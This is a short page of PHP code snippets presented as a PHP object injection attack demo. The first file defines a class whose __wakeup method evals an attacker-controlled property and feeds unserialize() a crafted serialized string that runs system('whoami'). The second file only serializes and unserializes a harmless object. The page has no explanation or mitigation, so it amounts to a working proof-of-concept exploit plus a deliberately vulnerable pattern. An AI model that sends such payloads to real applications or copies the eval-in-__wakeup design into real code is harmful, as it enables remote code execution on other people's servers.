Php Object Injection Attack Code Snippets

phpserializeattack.php

<?php
class PHPObjectInjection{
        public $inject;
 
        function __wakeup(){
           if(isset($this->inject)){
                eval($this->inject);
            }
        }
     
}

$a= new PHPObjectInjection();
$b=serialize($a);
echo $b;
$b="O:18:\"PHPObjectInjection\":1:{s:6:\"inject\";s:17:\"system('whoami');\";}";
$c=unserialize($b);
print_r($c);

simpledesserphp.php

<?php
class PHPObjectInjection{
        public $inject;
     
}
$a= new PHPObjectInjection();
$b=serialize($a);
echo $b;
echo "\n";
$c=unserialize($b);
print_r($c);